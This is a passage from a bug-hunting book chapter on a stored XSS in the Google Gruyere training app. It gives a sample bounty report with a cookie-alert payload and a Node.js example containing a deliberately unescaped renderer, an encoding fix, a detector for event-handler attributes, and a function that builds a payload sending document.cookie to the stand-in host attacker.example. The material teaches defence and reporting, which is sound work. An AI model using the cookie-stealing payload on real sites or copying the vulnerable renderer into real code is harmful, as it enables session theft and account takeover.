Page 86 - Hands-On Bug Hunting for Penetration Testers
Unsanitized Data – An XSS Case Study Chapter 4
Attack Scenario
Coming up with a good attack scenario isn't as essential as the previous data points, but
it can be a great way to increase the bug's assessed severity and boost your payout.
For this attack, we'll highlight the extent of the damage beyond a single snippet page. An
attacker who can execute arbitrary JavaScript through a stored XSS bug runs that script in
the vulnerable application's origin, so they can read any of that application's cookies that
aren't flagged HttpOnly (the report's payload shows this by popping Gruyere's own cookie),
send them to a server they control, and then act as the victim for as long as the session
stays valid. In a financial app (a bank, broker, or crypto exchange) or a social network
(Twitter, Facebook, Instagram), the same class of bug would mean account takeover, and from
there identity theft, credit card fraud, and other cyber crimes. One caveat keeps the scenario
honest: the injected script cannot read cookies belonging to other sites the victim happens to
be logged into, because the browser's same-origin policy confines document.cookie to the origin
that served the page, so the severity argument rests on what the vulnerable app itself protects.
Here's how our report will look:
CATEGORY: Persistent Stored XSS
TIME: AM UTC
URL: https://google-gruyere.appspot.com/newsnippet.gtl
PAYLOAD: <a onmouseover="alert(document.cookie)">xss link</a>
METHODOLOGY: XSS payload submitted manually
INSTRUCTIONS TO REPRODUCE:
  1. Navigate to the New Snippet submission page.
  2. Enter the XSS payload into the New Snippet form.
  3. Click Submit and create a new snippet.
  4. The malicious XSS contained in the payload is executed whenever someone
     hovers over the snippet with that link.
ATTACK SCENARIO:
  With a persistent XSS vulnerability to exploit, a malicious actor could
  exfiltrate sensitive cookies to steal the identity of Gruyere's users,
  impersonating them in the app and performing any action their session
  permits at the time of the XSS script's execution.
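To make the report's reproduction steps and attack scenario concrete, here is an added example in Node.js that is not code from the book or from Gruyere. It models the vulnerable sink with a stand-in renderer that interpolates the stored snippet straight into the page, shows the same renderer with HTML entity encoding applied, adds a check that flags inline event-handler attributes in rendered output, and builds the beaconing variant of the payload that the attack scenario describes. The renderer, the check, and the collector URL https://attacker.example/c are assumptions for illustration, not Gruyere's real template or a real host.

```javascript
// Added example: a stored-XSS sink, its output-encoding fix, and the
// exfiltration variant of the report's payload. Not the book's or Gruyere's
// code; the renderer is a constructed stand-in for the snippet template.

// The payload from the report, verbatim.
const REPORT_PAYLOAD = '<a onmouseover="alert(document.cookie)">xss link</a>';

// Encode the five characters that let attacker text break out of an HTML
// text node or out of a double- or single-quoted attribute value.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable sink (constructed stand-in): the stored snippet is concatenated
// into markup with no encoding, so any tag or event handler in it goes live.
function renderSnippetVulnerable(snippet) {
  return `<div class="snippet">${snippet}</div>`;
}

// Fixed sink: the same template, but the snippet is treated as text.
function renderSnippetSafe(snippet) {
  return `<div class="snippet">${escapeHtml(snippet)}</div>`;
}

// Reviewer's heuristic: does any real tag in the rendered output carry an
// on* event-handler attribute? Encoded text never matches, because its '<'
// has become '&lt;'. This is a quick check, not an HTML parser.
function containsEventHandler(html) {
  return /<[a-z][^>]*\son[a-z]+\s*=/i.test(html);
}

// The attack-scenario variant: same hover trigger, but instead of alert()
// the handler beacons document.cookie to a collector the attacker controls.
// collectorUrl is hypothetical. An image request is enough because the
// attacker never needs to read the response, so CORS does not get in the way.
function exfilPayload(collectorUrl) {
  return `<a onmouseover="(new Image).src='${collectorUrl}?c='+encodeURIComponent(document.cookie)">xss link</a>`;
}

// Stand-alone demo of the three pieces.
function demo() {
  const vuln = renderSnippetVulnerable(REPORT_PAYLOAD);
  const safe = renderSnippetSafe(REPORT_PAYLOAD);
  console.log('vulnerable:', vuln, '->', containsEventHandler(vuln) ? 'live handler' : 'inert');
  console.log('fixed:     ', safe, '->', containsEventHandler(safe) ? 'live handler' : 'inert');
  console.log('exfil:     ', exfilPayload('https://attacker.example/c'));
  return { vuln, safe };
}

demo();
```

Output encoding at the sink is the fix the report should ask for; marking the session cookie HttpOnly is the defence-in-depth step that keeps a surviving XSS from reading it, though the script could still drive the app from inside the victim's browser.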